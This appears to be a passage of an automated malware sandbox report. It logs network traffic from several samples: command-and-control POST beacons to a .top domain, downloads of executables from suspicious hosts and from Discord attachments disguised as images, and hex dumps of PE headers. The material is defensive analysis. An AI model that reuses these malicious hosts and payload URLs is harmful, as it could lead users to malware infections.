00 00 00 00 00 00 00 14 a9 07 00 50 00 00 00 00 40 77 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 38 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 9f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 a4 07 00 00 10 00 00 00 a6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 c0 07 00 00 16 00 00 00 aa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 75 6c 6f 66 69 76 e5 02 00 00 00 30 77 02 00 04 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 40 77 02 00 40 00 00 00 c4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 22 01 00 00 80 77 02 00 24 01 00 00 04 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:11:25 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
                        Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49826 version: TLS 1.0
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xauocndh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gurxx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ktkcvjuue.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://adlotmsqn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edkykp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://koyxalg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hxdci.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uixmltkfi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqqrnpr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ihqsjj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://civbpqln.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pqobqf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cuuhert.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cpmovtar.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csbokajdc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://adqaqqqe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjcvackirk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lylgknghko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wexymhl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://glqydpsa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kqbwtkcju.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdonp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfxrwj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxvawpr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctbemocusw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wofjmrw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdcmurwfts.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drroxf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqvvicnwkv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmylopjj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pvxvmaqhni.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhlsdp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vexln.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukjpg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oahqstcrl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sowcs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yhtqeo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wepobp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uriot.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://isqhctlhh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pbejr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufipchi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: hajezey1.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vlotoun.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: hajezey1.top
                        Source: global trafficTCP traffic: 192.168.2.5:49842 -> 93.115.20.139:28978
                        Source: 152F.exe, 00000023.00000003.505435036.0000000002F2C000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.97/
                        Source: 152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.97/.top&)
                        Source: 152F.exe, 00000023.00000003.505435036.0000000002F2C000.00000004.00000001.sdmp, 152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.97//l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861
                        Source: 152F.exe, 00000023.00000003.505435036.0000000002F2C000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.97//l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861(
                        Source: 152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmpString found in binary or memory: http://91.svchost.exe
                        Source: 77DC.exeString found in binary or memory: http://fontello.com
                        Source: 152F.exe, 00000023.00000003.497798547.0000000002EDB000.00000004.00000001.sdmpString found in binary or memory: http://telegalive.top/
                        Source: 152F.exe, 00000023.00000003.497798547.0000000002EDB000.00000004.00000001.sdmpString found in binary or memory: http://telegalive.top/O
                        Source: A557.exe, A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
                        Source: AdvancedRun.exe, AdvancedRun.exe, 0000001E.00000000.426329937.000000000040C000.00000002.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
                        Source: A557.exeString found in binary or memory: https://cdn.discordapp.com/attachments/8
                        Source: A557.exe, A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
                        Source: A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
                        Source: 77DC.exeString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903702020781907998/4D0A6361.jpg
                        Source: 152F.exe, 00000023.00000003.505195772.0000000002EFB000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                        Source: 152F.exe, 00000023.00000003.505195772.0000000002EFB000.00000004.00000001.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
                        Source: 152F.exe, 00000023.00000003.505195772.0000000002EFB000.00000004.00000001.sdmpString found in binary or memory: https://toptelete.top/agrybirdsgamerept
                        Source: unknownDNS traffic detected: queries for: xacokuo8.top
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_004070B4 HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                        Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
                        Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
                        Source: global trafficHTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
                        Source: global trafficHTTP traffic detected: GET //l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
